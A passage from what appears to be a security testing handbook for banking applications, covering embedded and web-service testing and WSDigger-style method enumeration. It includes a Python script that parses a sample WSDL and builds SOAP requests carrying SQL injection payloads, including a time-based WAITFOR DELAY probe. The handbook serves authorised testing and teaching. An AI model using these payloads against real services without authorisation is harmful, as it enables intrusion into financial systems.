Embedded application – Security Testing Handbook for Banking Applications

3: The Tools of the Trade
Embedded application
An embedded application is one whose software is built into the hardware it ships on. Often there is no interface for reaching the device remotely, so we have to be physically present in front of it to test it, and the chances of being able to load our own tools onto the machine are very slim. The approach we take to testing such applications is therefore different. We look at the operating system the application runs on and perform a local assessment both without credentials and with a login to the machine. Once we have a login, we check the configuration settings of the operating system that is running. We then review the source code for any code that has not been written securely and report it.
Web services application
A web service is very similar to a normal application, except that it has no user interface of its own. Instead it provides an application programming interface that exposes methods for the requester to invoke.
Every method published in a web service's interface description is exposed to anyone who can retrieve that description. A given user may be expected to invoke only two or three of the exposed methods, but they are able to discover the others as well, and if those methods are not adequately protected they can invoke them too. A tool called WSDigger can assist us a lot here in studying the methods available. The exact structure of each call is described in a document called a WSDL (Web Services Description Language) document, which lists all of the published methods; WSDigger parses the WSDL to identify them. Here is a screenshot of WSDigger. Once you click Get Methods, a list of methods is displayed, together with all their parameters and any default values those parameters have.
Figure 36: WSDigger
It is also possible to test the parameters for SQL injection through WSDigger. Select the parameter you want to test for SQL injection, then go to Attacks, choose Select Attack Types and pick the attacks you want to perform. The list can be extended with your own payloads, or narrowed to only specific attacks.
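As an added example (not code from the handbook or from WSDigger), the following Python script does in code what the text does with WSDigger: it parses a WSDL, lists every advertised operation with its parameters and default values, and then generates one SOAP request per SQL injection payload for a chosen parameter. The WSDL, its namespace, endpoint and operation names are constructed for this example and trimmed to the request side of each operation; the script only builds the requests and does not send them.

```python
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

WSDL = "{http://schemas.xmlsoap.org/wsdl/}"
XSD = "{http://www.w3.org/2001/XMLSchema}"
SOAP = "{http://schemas.xmlsoap.org/wsdl/soap/}"
SOAP_ENV_NS = "http://schemas.xmlsoap.org/soap/envelope/"

# Constructed WSDL for this example (namespace, endpoint and operations are
# invented); only the request side of each operation is described.
SAMPLE_WSDL = """<definitions xmlns="http://schemas.xmlsoap.org/wsdl/"
  xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"
  xmlns:tns="http://ws.example.com/accounts" targetNamespace="http://ws.example.com/accounts">
  <types><xs:schema targetNamespace="http://ws.example.com/accounts" elementFormDefault="qualified">
    <xs:element name="GetBalance"><xs:complexType><xs:sequence>
      <xs:element name="accountNumber" type="xs:string"/>
    </xs:sequence></xs:complexType></xs:element>
    <xs:element name="AdminListAccounts"><xs:complexType><xs:sequence>
      <xs:element name="branchCode" type="xs:string"/>
      <xs:element name="limit" type="xs:int" default="50"/>
    </xs:sequence></xs:complexType></xs:element>
  </xs:schema></types>
  <message name="GetBalanceIn"><part name="parameters" element="tns:GetBalance"/></message>
  <message name="AdminListAccountsIn"><part name="parameters" element="tns:AdminListAccounts"/></message>
  <portType name="AccountsPortType">
    <operation name="GetBalance"><input message="tns:GetBalanceIn"/></operation>
    <operation name="AdminListAccounts"><input message="tns:AdminListAccountsIn"/></operation>
  </portType>
  <binding name="AccountsBinding" type="tns:AccountsPortType">
    <soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>
    <operation name="GetBalance"><soap:operation soapAction="http://ws.example.com/accounts/GetBalance"/></operation>
    <operation name="AdminListAccounts"><soap:operation soapAction="http://ws.example.com/accounts/AdminListAccounts"/></operation>
  </binding>
  <service name="AccountsService"><port name="AccountsPort" binding="tns:AccountsBinding">
    <soap:address location="http://ws.example.com/accounts.asmx"/>
  </port></service>
</definitions>"""


def parse_wsdl(wsdl_text):
    """Every operation the WSDL advertises, with its request element, input
    parameters (name, type, default) and SOAPAction, plus the service endpoint.
    Assumes the common document/literal wrapped style (one element per message)."""
    root = ET.fromstring(wsdl_text)
    elements = {  # request element name -> the parameter elements nested inside it
        el.get("name"): [{"name": p.get("name"), "type": p.get("type"), "default": p.get("default")}
                         for p in el.findall(f".//{XSD}element")]
        for schema in root.iter(f"{XSD}schema") for el in schema.findall(f"{XSD}element")}
    messages = {m.get("name"): m.find(f"{WSDL}part").get("element").split(":")[-1]
                for m in root.findall(f"{WSDL}message")}
    actions = {op.get("name"): op.find(f"{SOAP}operation").get("soapAction", "")
               for b in root.findall(f"{WSDL}binding") for op in b.findall(f"{WSDL}operation")
               if op.find(f"{SOAP}operation") is not None}
    operations = {}
    for op in root.iterfind(f"{WSDL}portType/{WSDL}operation"):
        element = messages[op.find(f"{WSDL}input").get("message").split(":")[-1]]
        operations[op.get("name")] = {"element": element, "params": elements.get(element, []),
                                      "soapAction": actions.get(op.get("name"), "")}
    address = root.find(f".//{SOAP}address")
    return {"namespace": root.get("targetNamespace"),
            "endpoint": address.get("location") if address is not None else None,
            "operations": operations}


def build_soap_request(info, op_name, values):
    """Headers and body of a SOAP 1.1 call to op_name; each parameter is taken
    from values, falling back to its WSDL default. Values are XML-escaped so a
    payload containing < or & cannot break the envelope itself."""
    op = info["operations"][op_name]
    fields = "".join(f"<{p['name']}>{escape(str(values.get(p['name'], p['default'] or '')))}</{p['name']}>"
                     for p in op["params"])
    body = (f'<soapenv:Envelope xmlns:soapenv="{SOAP_ENV_NS}"><soapenv:Body>'
            f'<{op["element"]} xmlns="{info["namespace"]}">{fields}</{op["element"]}>'
            f'</soapenv:Body></soapenv:Envelope>')
    headers = {"Content-Type": "text/xml; charset=utf-8", "SOAPAction": f'"{op["soapAction"]}"'}
    return headers, body


# Classic probes: error-based, boolean pair, then a time-based probe (T-SQL syntax)
# for blind cases where the response body gives nothing away.
SQLI_PAYLOADS = ["'", "' OR '1'='1", "' OR '1'='2", "'; WAITFOR DELAY '0:0:5'--"]


def sqli_test_cases(info, op_name, target_param, payloads=SQLI_PAYLOADS):
    """One (payload, headers, body) per payload: the payload goes into
    target_param, every other parameter keeps its WSDL default or a benign filler."""
    op = info["operations"][op_name]
    if target_param not in [p["name"] for p in op["params"]]:
        raise ValueError(f"{op_name} has no parameter {target_param!r}")
    cases = []
    for payload in payloads:
        values = {p["name"]: payload if p["name"] == target_param
                  else (p["default"] if p["default"] is not None else "1") for p in op["params"]}
        cases.append((payload,) + build_soap_request(info, op_name, values))
    return cases


if __name__ == "__main__":
    info = parse_wsdl(SAMPLE_WSDL)
    print("Endpoint:", info["endpoint"])
    for name, op in info["operations"].items():  # every advertised method, WSDigger-style
        print(" ", name, [(p["name"], p["type"], p["default"]) for p in op["params"]])
    for payload, headers, body in sqli_test_cases(info, "AdminListAccounts", "branchCode"):
        print(headers["SOAPAction"], body)
```

Each returned headers and body pair is what you would POST to the endpoint from the WSDL; compare the responses across payloads (database errors, bodies that differ between the two boolean probes, a delayed reply to the time-based one) exactly as you would read WSDigger's attack results. Note that this enumeration sees only what the WSDL lists, which is why methods that exist on the endpoint without being advertised still have to be probed separately.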
The application publishes the methods relevant to its functionality in the WSDL for everyone to see. However, there may still be methods that exist on the endpoint without being advertised there. While testing we make an attempt to discover these unadvertised methods as well.